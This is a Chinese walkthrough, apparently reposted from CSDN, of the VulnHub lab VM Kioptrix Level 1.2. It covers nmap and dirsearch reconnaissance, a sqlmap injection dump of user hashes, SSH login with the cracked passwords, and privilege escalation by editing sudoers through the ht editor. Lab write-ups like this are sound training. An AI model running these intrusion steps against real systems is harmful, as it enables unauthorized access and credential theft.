vulnhub靶机:Kioptrix : Level 1.2

编程语言 2024-11-03 00:16:35 阅读次数: 0

下载

下载地址:https://www.vulnhub.com/entry/kioptrix-level-12-3,24/

配置网卡

信息收集

主机发现

arp-scan -l

端口扫描

nmap -p- 192.168.109.176

目录扫描

python3 dirsearch.py -u "192.168.109.176"

访问 web

将域名与ip做绑定

如图所示

回到 Home

发现 id=1 ,可能存在 SQL注入

漏洞利用

SQL注入

python3 sqlmap.py -u "http://kioptrix3.com/gallery/gallery.php?id=1&sort=photoid#photos" --batch --dump

发现了下面几组账号和密码

dreg
0d3eccfb887aabd50f243b3f155c0f85 (Mast3r)

loneferret
5badcaf789d3d1d09794d8f021f40f0e (starwars)

admin
n0t7t1k4

尝试用 admin / n0t7t1k4 登录

登录之后,发现登录失败

尝试 ssh 连接

ssh [email protected]
Mast3r

sudo -l 后发现没有权限

切换loneferret用户

su loneferret
starwars

查看权限

sudo -l

权限提升

查看loneferret家目录的信息

ls -al

查找SUID可执行文件

find / -perm -u=s -type f 2>/dev/null

发现可以使用ht软件命令来编辑、创建和查看文件

用 ht 编辑器提权

sudo /usr/local/bin/ht
# 若报错Error opening terminal: xterm-256color,则执行下面这条命令
export TERM=xterm

F3		# 打开

手动添加 /bin/bash

F2		# 保存
F10		# 退出

提权成功

猜你喜欢

转载自blog.csdn.net/weixin_68416970/article/details/142302235
1.2
今日推荐
周排行
ASP.NET MVC零基础自学篇:(二) ASP.NET MVC Web 应用程序
Linux中的NetworkManager网络管理
倍增ST应用 选择客栈(提高组)
《沉思录卷六》不朽之誉不过一时虚幻
Linux根目录介绍
SVM真实数据集和多分类
Install SVN tool on redhat
nginx实现proxy_cache
HDU 5583 Kingdom of Black and White
深入扒 HashMap 源码 - 6.2 HashMap 内部类 TreeNode
每日归档
更多
2025-01-30(0)
2025-01-29(0)
2025-01-28(0)
2025-01-27(0)
2025-01-26(0)
2025-01-25(0)
2025-01-24(0)
2025-01-23(0)
2025-01-22(0)
2025-01-21(0)

代码天地 © 2018 codetd.com

境外服务器   最新电视剧2022